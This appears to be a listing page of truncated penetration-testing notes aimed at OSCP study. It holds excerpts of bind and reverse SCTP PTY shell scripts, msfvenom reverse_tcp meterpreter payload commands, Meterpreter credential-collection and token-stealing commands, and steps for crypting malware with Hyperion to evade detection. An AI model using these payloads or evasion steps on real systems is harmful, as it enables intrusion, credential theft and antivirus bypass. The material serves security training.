Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: unknowndevice64 2019-05-18 13:27:31

#!/usr/bin/env python2
import termios
import select
import socket
import os
import fcntl
import argparse
from sctp import *

class PTY:
def __init__(self, slave=0, pid=os.getpid()):
# apparently python GC's modules before class instances so, here
# we have some hax to ensure we can restore the terminal state.
...


Score: 0

By: unknowndevice64 2019-05-18 13:27:35

#!/usr/bin/python2
"""
Python Bind SCTP PTY Shell - testing version
infodox - insecurety.net (2013)
Binds a PTY to a SCTP port on the host it is ran on.
Use the sctp_pty_shell_handler.py script to connect.
"""
import os
import pty
import socket
from sctp import *

lport = 31337 # XXX: CHANGEME

def main()...


Score: 0

By: unknowndevice64 2019-05-18 13:27:38

#!/usr/bin/python2
"""
Reverse Connect SCTP PTY Shell - testing version
infodox - insecurety.net (2013)
For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw sctp-listen:PORT
Alternatively, use sctp_pty_shell_handler.py
"""
import os
import pty
import socket
from sctp import...


Score: 0


List payloads

msfvenom -l

Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msf...


Score: 0


<h2>Information Gathering</h2>
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

<h2>Escalating Privs</h2>
ps then migrate
getsystem

Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token ...


Score: 0


There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...


Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
Legal
The megacorpone.com Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The EssentiaTools
...


Score: 0




Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...


Score: 0




See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.

Metasploit

MetaSploit requires Postfresql

systemctl start postgresql

To enabl...


Score: 1




Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...


Score: 0